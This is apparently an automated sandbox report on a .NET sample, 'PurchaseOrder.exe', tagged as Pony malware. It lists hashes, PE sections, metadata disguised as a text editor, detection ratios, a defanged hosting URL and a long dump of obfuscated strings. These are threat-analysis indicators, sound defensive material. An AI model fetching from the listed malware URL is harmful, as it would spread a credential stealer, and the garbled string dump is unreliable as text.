MalScore
100/100
MalFamily
Pony

PurchaseOrder.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 46/68 Related 2723
File details Download PDF Report
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 149.00 KB (152576 bytes)
Compile time: 2018-08-06 09:07:49
MD5: 87df56561f7926ae3419dc90521e37d4
SHA1: 5ee379132be3f84a9ae08b92c1a007940619e5f1
SHA256: 568bff0792bdccf2190295798b8dd20c225ed829d8d6d203d8b582bc5c1d0234
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 4 import resource debug relocation
First submission: 2018-09-17 22:24:04
Last submission: 2018-09-17 22:24:04
Filename detected: - PurchaseOrder.exe (1)
URL file hosting
hXXp://psatafoods.com/pawpaw/PurchaseOrder.exeVirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-09-12 06:39:46 [46/68] VirusTotal
PE Sections 2 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0xb044 45568 67ba97109a6ec7fb5a32210561028966 4ff842c46ce3c2aae067c40ee6ac915c47c21e73
.rsrc 0xe000 0x19d08 105984 be0f8ef4f356dcf304eeb201bb6811df bbfcfed730f1c0e9135e520553c8a4265ad5a8b1
.reloc 0x28000 0xc 512 193ce9446f7f6cb7897c421426de2ca1 e0c8b15b66389c909e90413c0ee83df810b7e96f
PE Resources
Name Offset Size Language Sublanguage Data
RT_ICON 0x12188 16424 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_GROUP_ICON 0x161b0 20 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_VERSION 0x161c4 800 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_HTML 0x164e4 71716 LANG_GERMAN SUBLANG_GERMAN
  • API Alert
  • Anti Debug
Meta Info
LegalCopyright: Copyright \xa9 2017
Assembly Version: 1.1.0.0
InternalName: TextEditor 1.1.exe
FileVersion: 1.1
CompanyName:
LegalTrademarks:
Comments:
ProductName:
ProductVersion: 1.1
FileDescription: TextEditor 1.1
Translation: 0x0000 0x04b0
OriginalFilename: TextEditor 1.1.exe
XOR
No XOR informations found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
FIle type: Library
mscoree.dll
IP Found
No IP detected
URL(s)
No URL found
String too long
Pttc}e~QPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSS
aPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSREPy
ZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSS
2EZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZ
 
aPAZSSUP`jEZPQ~:L,EZ
SUPaP
ZQV
PdQA\
all
Comments
!\.
MarshalByRefObject
,8!2')P~!6?Si^`
PEZP
AssemblyLoadEventArgs
InternalName
AttributeUsageAttribute
45<UPETE
SUPqPEZSS
)ZS
8L4;{9.@"8O)
Translation
* !5
)tZg[T
'ZSSW
>J0;_
aQE[SSUQaPzZSSQPcPEZSSUP%PD
<)Z
pehcbmP-BD
**':89
ClassLibrary1.Class1
LegalCopyright
>EZ
ConfigNodeType
SYP
)734;!p
9+=}79<
p;_C8It;{y.@b8Oi
#&(:#!9
9"2'S
ST`Q`ujg1eP%^D
PEZSSU
AttributeTargets
ConfigNode
7JX
j23=6-5
ArgumentException
UPaPEZSRUP)P
= Z
?!/0'
:1'1
6)6>7<
PDZSSUPaPEZSSUPaPEZSSUPaPEZSS
SSWP
StringFileInfo
( ::>aPttc}e~QP
AppDomainHandle
D3*9<vUP
hWpj>61 7Jpj.2!25
Copyright
Pttc}e~QPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSS
~!6?
,8!2')PPuRR
aPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSREPy
SUPaPEZSSUP
6*(>i
AggregateException
LegalTrademarks
SUPaPEZ
"+;?
ProductVersion
bdPD
SR$Pc&EY(ST
Z[SUPaP
62 &
PEJ
<%)
UPaPEZSS
SQPaPCZSS
P`PZZPSTPdP@ZuSZPbPDZRSVP`PGZSYTPaV
SEP
XGST
757&6$/1(?SS
sMWEBUJsbTyR
ZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSS
ZSV9P
27;!*d~
VarFileInfo
ExecutionEngineException
$ 7}
6*Z
;wU
SUPaPEZs
113<=UPa
EZSSUPaQDZc
1.1.0.0
5(t
!:29
PEZSSUP!
?! <?
>Fh;S
Assembly Version
CompanyName
FileStream.class
bPAZ
2017
#,5=Sd~Q~utcSmX`
SafeFileMappingHandle
ZSSUPaPEZSSUPaPEZ
:?0
1.1
Fka
`QEZ_S
PmP
ProductName
PaP
<)'68~"?7?}79<
Int16
5nz|#91
ExceptionResource
Action3
5(?='{4
VS_VERSION_INFO
:?0>
7$6
P.P
gqczXgkClZLf
?4#
ResolveEventHandler
UPaPEZSSgqhs
FileVersion
2EZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZSSUPaPEZ
000004b0
Tuple3
SSUP
FileDescription
SUPaPEZSS
OriginalFilename
TextEditor 1.1.exe
u(;76p
TextEditor 1.1
SettingsSection.resources
UP`PE[RRELBUD[
SRUPaPEZpSQPaPEZRbUPePEZSST
ConsoleCancelEventHandler
2;1
ZOSUPaPEZSSUPaPEZSSUPaP
LocalDataStoreElement
aZSS
AppDomainSetup
!2;#
Int64DefaultBinder
43-#0h857f6b0`5a
<GV%
CultureAwareComparerSafeLocalAllocHandle
o 0;
dDC$e
PNG
j!I]
qYQtv
j|Hk?
AppContextDefaultValuesAggregateException
j*.r
P"w
:kJGN+?
mbYcN
|P=}
ConsoleDataMisalignedException
LocalDataStoreMgr
k[Cs
EnvironmentOutOfMemoryException
LE}In
`Q!YH7
Func2Exception
'Oo,
e&M^c
2JYV
SafeViewOfFileHandleComparison1
DataMisalignedExceptionAttributeUsageAttribute
sy\}{g
l)F,l?V6r i:n
D-J'2.W
ilBv@-z<
r*
8
)H	$>'
AttributeConfigTreeParser
K48T
9rFi
N,1&
n~5o
4gv
]<j`
|y8&^
W:!F@
i t,o4A't!i7u$eaA#s m8l*C<n3i7u
E
PsJ
_]xj
7H`g|
x  8c
IFormatProviderDecimal
S
^+P
{oa&;
IEnumerator
h|.`
h<spp
a<i?e>
XEltdm
e.HE
\VVU
lI2Q
_AppDomainSafeProcessHandle
;7C78
}	NLA
CLSCompliantAttributeTypeUnloadedException
%\Sr
GCNotificationStatus
A]VZ(
r9cEI
SafeHandleMinusOneIsInvalidArgumentException
_&Wo|
OQQ_z
w"Q~`
ThrowHelperActivationContext
p^^d
V[aG"
rKqj
?)1
#NHcTT
PADPADP
i7by
s e8b<y"u<t0r?A't!i7u$eaS)s1e7.
IClrStrongNameAsyncCausalityStatus
bA-Ok
9h7p|
CharEnumeratorSafeFileMappingHandle
op9l$t3o=R6l4x1t
u1leS.u7i< g0a3=P"o/e9t \
OutOfMemoryExceptionSystemException
luqz
Tuple1IAsyncCausalityTracerStatics
!v_!
r<L6^\
9&v?f
bi--
;C4[
"SUsA
5#M
s
|{Qv
~Y7?
ArgumentNullExceptionAggregateException
-%ho
$n&i7o4m6n'S!r9n
#Blob
o>p4n)A
&z$Z
+cyu
Program
2ov"a
Rl2Fd,
)Msw
U e!s	a4m
AppDomainSafeHandleZeroOrMinusOneIsInvalid
PrinterUnit
L%4o
>Hl:
o=f
.
bj,QB
^u%b
]PVAY&
T,@?m
"S)N
"j$7
2e$_"o=p,l?d
7eA;
a0 RKk8
ly<P
3ts\
vg`v8
Kix*
ykcx
RegistryValueOptionsAssemblyRef
R$"#
RirX!>
;<\R
e|{o
u1s'r<n7
7fGV
cOBZH2L%
Gcz
of.7
i>3_>D9s5l;y
Tuple5Exception
p*"s
j[E`	FkYIV
_R5O2/
:#L\/
4hh(
["}c@D
)!DJ
ITracingStatusChangedEventArgsAppContextDefaultValues
nOE#
LG\@
p~GB
}aDUJs
ePA6s?m1l*
8tCDTvr
#g<v
]SfH
8^ 1
|F>
GetParameters
SafeLsaMemoryHandleDBNull
t~+6
*Z>j
%	~O
.text
Jr?[
QueryTaskGroupStateOperand
0Lhn
CausalityTraceLevelIndexOutOfRangeException
GCConsoleKey
RegistryValueKindFunc2
0.*[E
GfY~1c4\
U{Nm
a$i*n
~3 
Z2&M
e's9o
oai@
_S7
9o&]Xrq
D?mkC5m#i?e'
_pZ7
q[t5"g|
AssemblyLoadEventHandler
=k9'
:-.A
*[D6
DecimalSafeLsaReturnBufferHandle
DateTimeOffsetCompatibilitySwitches
rSmU
U-q|}P}
iofL
k_\[`/
System.Net
$1mq
eC9GI
Q95%
&8.i
4
On"
`.rsrc
ToKc
S"H+V
{]Id8
>[buR
G.W~
lBOZ
*XPl
R0k$s
a$V(
y6t?mSO1j0c$
]~16
$
#X
ConsoleConfigEvents
2my|S
2>&"
61%-
~-
GZ
tl3e
,InR
q=Uf#
:_wUU
SafeWaitHandleFormatException
x1H%
RegistryOptionsLazy1
n<o)4l
A*hL
r\?S
QN*$!
L#L;P
5uU
Vz`F
SafeLocalAllocHandleConsoleColor
7g(
'CLq1?
EDhC(\
E[c"
kkfO
ICloneableAccessViolationException
Ldhkm
j#KC
p3i
GetBytes
L]*
}mcf
>s6o"e
A$t7i8u'eSA&s5m
Ob
G
c:\xampp\htdocs\crypting\HCH6Ku036cUcfREo\84V0eUYQwXugtkJ7.pdb
7Bx
)yDq
T D$A
K@lV
!-vP
=cO+
=_e1
mHdQ
ConnectSocketState
S"%C
g{tpA
X-/[
w*tl
I]9b
RegistryOptionsComparison1
System.IO
XSB54
WrapNonExceptionThrows
s=wz
fOFlL9
EventHandler1CurrentSystemTimeZone
ffG!
]E?_
*hj}
ndbw$
e7VW7
8H7g9
DelegateBindingFlagsInvalidOperationException
-BFb???
h$A1t(i1u'eUA#s
T3!
]oC+
U]/
Om~8
'/)L`.f	0i"(
<Rta.)
r:>&
IHDR
#05l
yv7+
o_}:
b"a7yk\<b9\
C9It
;>9
EW!a%N?n$x3e5t3o=T;r:w#
UC#J
,~4J
b).
0hLo
System
4?
n|x
^y1wW
Evq,
i'/[
]2nw
pl5\#
t!i;g
8vgy
CreateInstance
u=t<m5.(n$e7o*S6r%i6e#
1UX&"
K|5q
l4s#L
m(.4
-|y^(2
MethodBase
#Strings
B\c%C
System.Collections
V-P4
I4c?u7e
IDictionaryEnumerator
a:a=
IAssemblyEnumInternal
gGyOT
`J't
r*)
zlI
S7@&
|P1Oo
e(o(ySS*s!e=."o<l c.i<n .
&>d/
5o\N
,08P
5h	-C
it_P
6$h?7Z
StrongNameHelpersResolveEventHandler
ResolveEventHandlerInsufficientMemoryException
{[;an
System.Diagnostics
DataMisalignedExceptionExceptionArgument
F{MZ
qSa\R
T G*J+,VJ
ArrayTypeMismatchExceptionFXAssembly
M{3
&u\)
ContextBoundObjectDBNull
Activator
6_>7<w
^>ay
w;3[gv
x@r*
$#	x
=gSZ
xK,"C
a3.b>
e=e'a$e(n
fa"
"o=V,s3b?e
>A"
<Gd0
MsF/
*(kk2
qu\m
NF[}
13a[
v
>:@
hn5{
S`{r#r
EnumDivideByZeroException
ActivationContextTracingStatusChangedEventArgs
c8/L,
aFp^^S
|E5d
wVc1
D0h
5hL/ZF
h\7
:NgN+
ncQ>
SA"Qb
Y@%Y
boc~
:>`a
ExceptionResourceSystem_LazyDebugView1
%GusZ
nJ-Kn
DelegateSerializationHolderSafeThreadHandle
$D<h[
:+>#
w_Ct
jt$:F
InternalGCCollectionModeFunc9
Action7LocalDataStoreSlot
VF,'jl'
V~JF'
{]fzhn
8Zb|
85zGO
xI<j
._~:)5
get_Unicode
2?-N
O77
Sfm>
"CZk`u0
jF
f8X
',Eb[
,T	o
;xzn
).Kj(
Lunby`
ApplicationIdentityAction1
'<k-
A b0t8Z
Hs@b}
9`^Al
Z*K/*
kt?x'
~|49`j
C/!L
GetEntryAssembly
t_Xw
t'r<b%t
2e$_$n$r<P5i=tSM0t8o
R54
@gLHF
0v4:
n&m6r4b<e
26UD
kzMM
-KST)
Wn<q
hlT5
( eN
so<O
N%u`0]\
q}t
oE=v<r?ne>t
nh!M
Fk /U_
"_ap
_tuOq'?\t
#uM;
MemberAccessExceptionInsufficientMemoryException
&~3z
hfX=
atfl
<_N!
=w?w
,;ni
7H`4Q
.
8J9
syDdq
-ptX
Ppn5
LocalDataStoreMgrChar
t(i=g
CannotUnloadAppDomainExceptionConfigEvents
#s_g
8Kru
oPp$m?
"=5
AppDomainUnloadedExceptionDBNull
TxW*[
^b]$E
q
4^M
Q* <
tc!l
K8P*
ArraySegment1IAssemblyName
WC?9v
ArgIteratorExceptionArgument
H:?+{
DllNotFoundExceptionAggregateException
E(p7e)s:o=S0tPa
lP.&t5rSm2d0
@\@DQ
2"23
UeX
args
84V0eUYQwXugtkJ7
=%Xh@
Wt`;
P<o'2J
HEMg
zO	w[u
Ls.2
(f>DG
r7a#E=u>e'a$o
.>u]x
(SdtD
ZM\)
_nz$w
aPYNrF
auGc
: ' ;
r#i*ngvg.f
4'6P
]C	m
%M4z
.391y
`1]D
57/O
X%L\
SafeHandleMinusOneIsInvalidArgIterator
UQiN
,VSAL~
pHYs
.ctor
LogLevel_AppDomain
ReflectionExtensions
'/iH
a7g?t
Hgm&;
qd#N{
Func2Convert
;!<l
8-O
&e~+![O
kg '
wjav
Main
ConsoleSpecialKeyBitConverter
{wm6
IClrStrongNameArraySegment1
AppDomainManagerInitializationOptionsComparison1
Invoke
"YM]
e#l?c'i<nUA#s
4ix
v4.0.30319
SafeLsaReturnBufferHandleCriticalHandleZeroOrMinusOneIsInvalid
,t/j
}~k]+?
Y4d.
+*	o
i4e7
SwitchStructureCriticalHandleMinusOneIsInvalid
&l1
u=e7a8l6
SafeViewOfFileHandleAction7
iC ;
@.reloc
o1u<e_
Action2ArgumentNullException
796O
|*6]
t3e
i&r5s<f'.
']c\
d
1
IClrStrongNamePredicate1
5@x)
MoveNext
*"s
,QRM
r; q.o
#[S0Or
$|w8"
McI~z\
l;s 1SC9a#s-i2r$r#1Sm c:r<i
_glW\2
__HResultsFlagsAttribute
\>1T
&
ScL
GetType
GCCultureAwareRandomizedComparer
20|6
cX|ziHZ
{'<Z
W(
E
1;_Y
Fhfe
t!r9b
m2l<T(a7e>a'k
Yku<
q4R8
b/J8
GrF
s e8b<yaM5t-o>I=f<
Ybj9M
EQoF
aPwv
v0}b
GmU<,
t"i'u.eSA s0m2l
RuntimeCompatibilityAttribute
</,=O
-)0|
PKU6*
Assembly
p\u7t]:
lZ#J7
e.7L
p=%7
p}$;
Jzsy
SafeHandleMinusOneIsInvalidAsyncCausalityStatus
m%^H
bJG!
/q K
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
AR\BR
AmuCC
#^^4
SafeViewOfFileHandle
^7yf_,
^C9a#s-i2r$r#1S
2
A2S`
8,@#JlL
ePS<s.e>.
zQ5
CMg~
H0SC
jUYE
|M"h
RSDSV5
\Nyt
~VvmQ
RegistryDefaultBinder
2L
n
$4"
Xb
SettingsSection.resources
pZiY
Iac}2
MkC[3
s0s!
AppDomainSetup
DebuggableAttribute
IEquatable1IObserver1
0Dh*
<7)<
IEquatable1ApplicationException
ArgumentNullExceptionInsufficientExecutionStackException
_XC
4Q@@
&hfN
G^7x
L-bh
Je$
Int16RegistryValueOptions
/%&
F`>
i<e7G?n6r2t0d
SafeThreadHandleStringSplitOptions
get_Key
"R.p))-*
gq\E+
+01F/a
?Hc*#
)Ncv
$<P83h
"DSv
4]+M
LocalDataStoreMgrTypeUnloadedException
c\AUR
bQ>S
evnv
#XbD
a.p|5
S$db38Ua2ch2ja5-g5ee}8
qe$92=
JSdI2f
il~!M
3b/
/c}\
E
(iS
0h|:
8\ YM
CultureAwareComparer__HResults
C%G.
y4a=$
ApplicationIdAppDomainUnloadedException
qZu^e
Cookie
+q#g
,=L
`)(\4
s#e(b6y
qEXF
cmt!
<?qz
ConfigTreeParserSZArrayHelper
`?#g
/p.*
atLPC
5cbn
J-T
yylWd
Yj\qvA
_}L
P"o!u9t
5O$E
b^O;
TracingStatusChangedEventArgsIClrStrongNameUsingIntPtr
mMHU
m3hM
IApplicationContextBCLDebug
J\4Ipf
Type
znA,
eZLF
e^~
get_Value
vZ;,
ArrayTypeMismatchExceptionFunc8
#213
Fw &
Func9Math
M|7
"+.5
ZMBJi
y t0m~R
:F^G
\%Ja+
gAMA
y t0m~D
<}
DP;
i-
f%h
InvalidCastExceptionMethodAccessException
HcACLvk
CLSCompliantAttribute
.cctor
Y68"
mscorlib
GetMethod
d&kM
}A1b
'nX:b`
KZ^~
$'Ta
'r1m w5r8D:s%l1y/a=eW.
LrsY
T\[d
?:+
Wu\ Q
#~=HE
F]g7
System.Reflection
KMY5
M5%O
yZO(
_l`b
Kp$'#
AppContextSwitchesFunc9
&G}I
V(RG
vErhx
<)a-
!Lj@6
GjG>
ue0E
System_LazyDebugView1ITuple
Func9ThisAssembly
$cw3oR
7y'B
RegistryOptionsCurrentSystemTimeZone
r2m0w?r
A$t7i8u'eSS,s$e.
LocalDataStoreElementCurrency
@C[C
.M@L
W#^`"4Cyco
Gz|j
Gef'
BadImageFormatExceptionFormatException
t.r:b&t0
op_Equality
ClZ.1
<t5
kO\up
0k2|
Datatype_NOTATION
hHI_8
Y}p5!8
'KKN*
OW/;\;
[AC>4#
jQZBex
ppS`
n6Y3
[yo
ObjectTuple1
D*$ 8d8
=U@u9L
N+z<
X7Ws^prMs
ugteqZz(Q
YM$c
^BlX}
r2ne
Ps+
'z'Z
Tuple1
- U2
bE{i
21	S
e9Xo
nO[_
w}d)
mscoree.dll
!This program cannot be run in DOS mode.

$
:@Ji
T	qhnup
[9AW
z~{$
?8hx
<
H'
Dispose
jYM)M!
"
 6
FlagsAttributeArgumentOutOfRangeException
SwitchStructureCausalitySynchronousWork
,
	o
G);2
0qJuK
qWnUz
9JyMJ(
l)M;i=
*Gu4d;
KWf-
8Lwo{
SFW1%
2e$_"h1r6
"8 e
QP~S
S9m5l?
-}}g}
VJ8C
Ed5s
#GUID
C>Wc
/c__pu:
IDisposableFunc8
<I7
sn^9
o%y"i
BSJB
OTWW
sAE-O:^nymP
Uv)!
ActivatorRegistryKeyPermissionCheck
HmAaN
op_Inequality
FormattableStringCharEnumerator
GetManifestResourceStream
CE^e
ObjectConsole
7L`6
Kj)mY
ExceptionResourceIComparable
P
7-Z
l>#W
aj3J
z[5M
tSV%w
Z*V0X
2,a.a5(
__Filters
6rIv
G`[R
FA67
;IYK
AppContextSwitches
xhN^
8 )k
-/=0}
s6e7b?y
'
_]:
'|K{r.
ExceptionResourceDateTimeKind
&,w
9~dw
a2l A.t!i1u!ePD
cJ=GN
Tuple7Int64
rp[/
i)]Rjg
~DDd@
hmQqV
H7-M
u/z
%h5I
q1!
/3f
Tuple6AppDomainManager
2hMW
vLa2
e1~hu
r6(]
ze+nD
+#o=!
&2"t
!vA$
o*l-
;!
XTe
vI-
C?L0
o*y!i4h!
{,/#o
cU]z1\
Bimk
MethodInfo
HKO9
ResourceReader
>'GQ
CompilationRelaxationsAttribute
<LEu
CrossAppDomainDelegateLazy1
P@kr?l<cS
@iU@@}H
\Pq8
db?w
i<e7S?r%i0e&
L+/
6ivM{
D@
8o4eO
]
a
u6
L!
vBZ-3
cX:6
0pM
_z/G
n%o8eUC?m
l2s&1PB
M~"M
*dH-
IEND
%U P
hB=}0ZK
PbKy
{N\Uj
jHwJ
v,1
-K^3
}!*c
RegistryValueOptionsByte
ZW^e
0{C/='
CrossAppDomainDelegateIConvertible
QdyJ
6Tby
o7e&
/ow}
?
&)j+
ConsoleColorInsufficientExecutionStackException
l]yL
EjL7#
C#v5c
F<LyT:m
t'r:b t5
rHSg
pL5\
6.\+
~#=-
%i`\
~?vx
ParameterInfo
awjX
qKm4
,/h\
0<`M
BadImageFormatExceptionSafeLibraryHandle
Lg^t
Dy|#
Z~xo
Action3AppDomainSetup
ExceptionResource
5&.g
.4l)
LoaderOptimizationASM_NAME
t5mkR/n'i>e{C?m
:{Q&w
'u>c%2ZS*s'e8.
System.Text
tc.d
System.Resources
Q s}
?vj
5=l6
pV	 P
LW f>
Z0au
lO7w
ByteActivationContext
_YUs
V\"y
ScanNotation1Asyncd__187
l$s)L:b!a'ya.
do;:g
0,c}
EAd@
`#DEpP^
/9|%
tH_s
;?Mzj2
W>,7A
String
oYUg7
s#RW
_CorExeMain
&B &
@}IK
=J1o
q,yGe
@<\?
5bgr
0"yA
B&t4
r4m5w
{#9&
DebuggingModes
DecoderExceptionFallback
C_ES#w
C_e
AppDomainHandleConfigNode
T%k
F9dS
$):"
CultureAwareRandomizedComparerLazyHelpers
...Z
EmptyArray1Func9
j+;k
3REX
uc5?7y
HcOW:
{muOK
{U{J
m2l<T3t?e
R	ha
IApplicationContextAction1
3E
Load
E%_ZM
ConfigNodeTypeCharEnumerator
a7n*s.i0sSD0b%g
Rb$
Ek
P
6~I+
2LAT
EWM.
B1s
XNBs
IFormattableSystemException
MemoryMappedFileAccessQueryTaskGroupState
8+1j>
[j:e
t{yp|
RegistryDelegate
T+(R
-;zr
w%gW%&hE
DelegateSerializationHolderAppContext
t|bmi
CurrencyAppDomainManagerInitializationOptions
TdL#
a
? E
c4'I
)A_C(o
uLw
Object
4\U2
h;r#C<d0P"o
=P<g
OrdinalComparerTuple4
Tuple7StackOverflowException
GuidSafeFileHandle
s'
&X
kab
s
GuidConfigNodeType
&U)r+
8zNr
2;j'
FormattableStringAppDomain
ResolveEventArgsLoaderOptimizationAttribute
j8mB
ConfigEventsMda
ia&gzG,
StringCultureAwareComparer
P0&;
EditorBrowsableState
7p:*
BAW T
ContextStaticAttribute
y t6m{C?d
*'?e
mCs0e
Y/[{
a4&
Stream
4Y5WR
x|
;
sRGB
SafeAccessTokenHandleTuple1
f l
ArgumentNullExceptionTuple4
ArgumentNullExceptionTuple7
0$R'.
zJS--^
ApplicationIdConfigEvents
p6 &
}C7#
pH~
);U1j[,
1!3q~0,
wa?Z
Func6AppContext
Action4IDisposable
aZUi
GCIComparable1
B!na
HjAXC#]
miK
ConfigTreeParserLocalDataStoreMgr
lSJGK
eS716h
qlV$1B8
CK^Y]-|n
Base64FormattingOptionsContextStaticAttribute
__HResultsArithmeticException
+Omu*
Z&foM
@H
c
ThisAssemblyRegistryOptions
mCq6H;
DBNullArithmeticException
JHh|'
$a$+
UO9
u0}
84V0eUYQwXugtkJ7.exe
xcbpW
3#&f
ConfigTreeParserDelegateSerializationHolder
dk/gh
m"T{
wi*
TZA
7$'=
8G%+
3$p
,Ou5dR
,":`XJ#
k.c.c.e
#4~0O3`3t9Z
R5s0l.sSC<m%i<e s#e(b6y
r9b0t?
V*V0Y
ConfigNodeSubTypeByte
sd|r
ZVX6{~v
\D6)
F@8/
JB
J
1{cp
#3'l
<rxj
;!ek
SafeLocalAllocHandleTuple3
ASM_NAME
&@2+9
/X1X^>8o
Byte
F|Mdz
?(=4
ArgIteratorInsufficientMemoryException
NUwyx$
ConsoleColorAction3
eziy !D`M
-zUEK
AsyncCallbackConsoleCancelEventHandler
}|\/'
ConfigNodeType
'ws/
dk`n)
^YSl_
M?v>
{gA
}lX/Y
jp\
kbl8#:x
x!	"
},Q
~I6Cq
j'L3
/0SXzR
vo_0
Func5FXAssembly
__HResultsAttribute
LHR2
EuDIX
*QvI
RegistryValueOptionsInt32
8r39
7W1z
MemberAccessExceptionTuple8
&0
C
InvalidTimeZoneExceptionIConvertible
|yad
dv*e^=
JXT,
IAsyncResultArgIterator
i;qPE
YD6b
EmptyArray1BadImageFormatException
&	o
b|1X
7<a
m"l*
l0@`
x/x:
o7r$mzc2n=o! 2eAr%nei4
K]tL
hN5
I%n,
{QVmf
@"QL(
5
^&
e.>1_0UE
_a]a-
[=Dm
6OQk
IDATx^T
OperandDatatype_NOTATION
\P8
*o/z
GetEnumerator
o
l5c1i5nSg6t
R5f
IHx;<
SafeWaitHandleDateTimeOffset
IQJ#
,(7
kZ}%
CharEnumeratorIndexOutOfRangeException
6e._
Action1
SBv>
$^BI
Qg+$L|
hl9]H
;$vRZ
2P1mO
roGQ
qcBg
$ySY
1PS l?c'
_9O
lCo\
o
`]
qIl0
hAk]
o~1-&
cB#p)A
kz"Q
SF"4
+uUY
]4 S
System.Runtime.CompilerServices
@r<3.d
j;9<
\
U
NeSD6Y
jMZ|'
A"z;
rdYP
hLo#
EF}I
"l"8
^	TH
^XWx
RES.r:n4
c%/j7
ReliabilityContractAttributeMemoryMappedFileAccess
z	>EM}
/8[S
@};B
kE"i2Sb
[m~j
Nv6Z@
TYj%G
vF9}
II
8
FiAF
IDisposable
Action3Action5
F(a>e$o'k|V
o9u>e=t&\
-]ji<
AppDomainStringSplitOptions
UqjyvS
h#o3I
~$N(t
s[kd9
:8>)
CeMF
r5n&e>A s6m7l9e
;9kz
__CanonGCCollectionMode
lWM'f7
<Module>
"
'J
rc_9
B=~7
CharEnumeratorDelegateBindingFlags
JcGQ
i|@`jMp
/OOoI/
C|rk
2B*m
j$2Mu3
c>O;Xi\2
l'FR
IDisposableCausalitySource
I>f*r7a'i<nUs5t>G5n r;t6E+e6u$a
lW
^#i"
o!m2tUs5t>C?m5i6e!O#t<o>saR5p)a9eSC<d0D?m1r?v,d?rSC<m%i<e
>|1u
~6hI1
s2ii@
)Ohl
:wQq
>N!o0
XU"4z
pIU8#
;!$1
s)e>b?y
z2%q.
t9m C5m#a'i7i<i
DGC6
IQUUj\IlL
K9Zn
~*:z
 S
SizedReferenceSizedReference
x%r5s
imBZb
D147
Win32NativeASM_CACHE
LocalDataStoreMgrFunc6
T7l-
(znSVF
LogLevelIClrStrongName
2;
gn8
1FY
RE1
IDATBCt
,Yo}iw%
!%8)
IAsyncCausalityTracerStaticsTracingStatusChangedEventArgs
*	T@
D>
iC3
y&t5mOC?l)e9t:o=s{G5n
$3
fB=
ticV
Encoding
7stL
I]sP
w6x-
KOL}
I%3_.
ConsoleSpecialKeyArgumentOutOfRangeException
y{l@
O]p|
alqO{
`-`)l
S/fv
ZHR&
p,0m
5/Fm
op9l r
a!a>e!e"sas5t
DllNotFoundException__HResults
~9nI
EmptyArray1SafeHandleZeroOrMinusOneIsInvalid
jx[
ccO3S
^-vvzT
@K&J
1'a,
t1r3b&t6
*Xz`
b%g"i4g
?!7
i~__v
(e`v
n$i(etV6r i:n9n
fipqp
DBNullConsoleCancelEventArgs
*bGa
Jl+q1
AccessViolationExceptionAppContext
s]BaWmG
DataGridViewCellFormattingEventArgs
4Y
VO5JGo
MethodAccessExceptionFunc6
P8gfG
+&`#
pJb'u
BS$r,n=sS
yIhLL
0:7D
ExceptionResourceInsufficientExecutionStackException
Rehr
_xn
CausalityTraceLevelConsole
CRGQk
BB<o'
:1R\_*H
X<'
.}>_h)
MMij
`
	,
P^R"
r?zv
8qQ4]
G~2[>
$YUmCL
f)+N`
sY*
~xByn
Wx{U
KwJJW
c<BC
LazyHelpersContextBoundObject
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven04_64 Seven04_64 VirtualBox 2018-09-17 22:20:21 2018-09-17 22:23:24 183

23 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven04_64 Seven04_64 VirtualBox 2018-09-17 22:20:21 2018-09-17 22:23:24 183

10 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
